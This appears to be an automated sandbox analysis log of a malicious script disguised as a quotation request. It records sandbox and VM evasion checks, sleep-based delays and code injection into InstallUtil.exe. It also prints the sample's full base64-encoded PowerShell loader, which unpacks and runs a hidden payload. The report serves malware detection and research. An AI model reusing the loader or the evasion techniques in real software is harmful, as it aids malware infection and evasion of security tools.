Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RFQ_43200046412000086500125.vbs.exe PID: 7728, type: MEMORYSTR

Powershell is started from unusual location (likely to bypass HIPS)

Source: c:\users\user\desktop\rfq_43200046412000086500125.vbs.exe

Key value queried: Powershell behavior

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Memory allocated: 4D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Memory allocated: 4D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4540000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Window / User API: threadDelayed 4642	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Window / User API: threadDelayed 4993	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1435	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 5345	Jump to behavior

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe TID: 7852	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -34000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -33875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -33765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -33656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -33547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -33437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -33328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -33218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -33109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -33000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -32890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -38000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -37875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -37766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -37656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -37547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -37438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -37328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -37219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -37110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -36985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -36860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -36735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -36602s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -36500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -36391s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -36282s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -36157s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -36047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -35938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -35813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -35688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204	Thread sleep time: -35563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 38000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 37875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 37766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 37656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 37547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 37438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 37328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 37219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 37110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36602	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36282	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|Xen4win32_process.handle='{0}'
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: InstallUtil.exe, 00000008.00000002.2080197076.0000000005350000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: GosE0b7EhUSvmciTa1T
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2041344599.00000000089B0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2060466239.00000000007E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 602000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 65C000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 65E000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 4FB008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==			Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "c:\users\user\desktop\rfq_43200046412000086500125.vbs.exe" -enc jabbag4abwb2ahaadabzahmaaqbqacaapqagafsauwb5ahmadablag0algbeagkayqbnag4abwbzahqaaqbjahmalgbqahiabwbjaguacwbzaf0aoga6aecazqb0aemadqbyahiazqbuahqauabyag8aywblahmacwaoackalgbnageaaqbuae0abwbkahuabablac4argbpagwazqboageabqblac4augblahaababhagmazqaoaccalgblahgazqanacwajwanackaowakafaaygbzaheacaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeeabgbvahyacab0ahmacwbpagoaiab8acaauwblagwazqbjahqalqbpagiaagblagmadaagac0atabhahmadaagadeaowagacqauqb5ahkaaqb0ahqadwbmagiadgagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabqagiacwbxahaalgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakaeyaeabnagoayqb0agiaeqbjagiaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafeaeqb5agkadab0ahcazgbiahyaiaapadsajabsagiabqb3aguaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0aowakafoaawbuagoabwbraheazqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbdag8abqbwahiazqbzahmaaqbvag4algbhahoaaqbwafmadabyaguayqbtacaajabgahgazwbqageadabiahkaywbiacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabaagsabgbqag8aawbxagualgbdag8acab5afqabwaoacaajabsagiabqb3aguaiaapadsajabaagsabgbqag8aawbxagualgbdagwabwbzaguakaapadsajabgahgazwbqageadabiahkaywbiac4aqwbsag8acwblacgakqa7afsaygb5ahqazqbbaf0axqagacqauqb5ahkaaqb0ahqadwbmagiadgagad0aiaakafiaygbtahcazqauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqauqb5ahkaaqb0ahqadwbmagiadgapadsaiaakaeoaegbragwacgbvahmaiaa9acaawwbtahkacwb0aguabqauaeeacabwaeqabwbtageaaqbuaf0aoga6aemadqbyahiazqbuahqarabvag0ayqbpag4algbmag8ayqbkacgajabrahkaeqbpahqadab3agyaygb2ackaowagacqauqbtahiazwbjagqazqbqacaapqagacqasgb6agsababyag8acwauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafeabqbyagcaywbkaguaagauaeqazqbjagwayqbyagkabgbnafqaeqbwagualaagacqauqbtahiazwbjagqazqbqac4atgbhag0azqapac4arab5ag4ayqbtagkaywbjag4adgbvagsazqaoackaiab8acaatwb1ahqalqboahuababsaa==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "c:\users\user\desktop\rfq_43200046412000086500125.vbs.exe" -enc jabbag4abwb2ahaadabzahmaaqbqacaapqagafsauwb5ahmadablag0algbeagkayqbnag4abwbzahqaaqbjahmalgbqahiabwbjaguacwbzaf0aoga6aecazqb0aemadqbyahiazqbuahqauabyag8aywblahmacwaoackalgbnageaaqbuae0abwbkahuabablac4argbpagwazqboageabqblac4augblahaababhagmazqaoaccalgblahgazqanacwajwanackaowakafaaygbzaheacaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeeabgbvahyacab0ahmacwbpagoaiab8acaauwblagwazqbjahqalqbpagiaagblagmadaagac0atabhahmadaagadeaowagacqauqb5ahkaaqb0ahqadwbmagiadgagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabqagiacwbxahaalgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakaeyaeabnagoayqb0agiaeqbjagiaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafeaeqb5agkadab0ahca